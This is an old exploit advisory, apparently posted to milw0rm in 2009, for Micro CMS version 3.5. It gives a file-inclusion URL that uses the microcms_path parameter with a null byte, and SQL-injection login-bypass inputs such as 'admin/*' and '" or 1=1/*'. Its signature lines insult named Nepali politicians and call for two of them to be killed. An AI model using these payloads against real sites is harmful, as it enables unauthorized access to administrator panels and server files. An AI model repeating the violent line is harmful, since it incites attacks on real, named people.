41 lines
No EOL
1.2 KiB
Text
41 lines
No EOL
1.2 KiB
Text
#################################################
|
|
# Micro CMS File inclusion Vuln #
|
|
# Micro CMS SQLi login bypass #
|
|
# By learn3r hacker from Nepal #
|
|
# damagicalhacker@gmail.com #
|
|
#################################################
|
|
|
|
Affected version: v 3.5 or may be lower...
|
|
|
|
#############################################
|
|
# File Inclusion Vuln #
|
|
#############################################
|
|
|
|
Requires register globals to be on...
|
|
|
|
Vuln file: microcms-inlude.php
|
|
http://localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=[FileInclusion]%00
|
|
|
|
|
|
#############################################
|
|
# SQLi Login Bypass #
|
|
#############################################
|
|
|
|
Vuln file: microcms-admin-login.php
|
|
|
|
Username: valid_username/* [eg. admin/*]
|
|
Password: learn3r [or whatever]
|
|
|
|
Or Username: " or 1=1/*
|
|
Password: learn3r [or whatever]
|
|
|
|
|
|
|
|
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
|
|
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
|
|
K!ll Upendra Yadav and Vijay Gachhedhaar
|
|
|
|
By learn3r aka cyb3r lord
|
|
Nepali Hackerz Are Not Dead!!!
|
|
|
|
# milw0rm.com [2009-09-16] |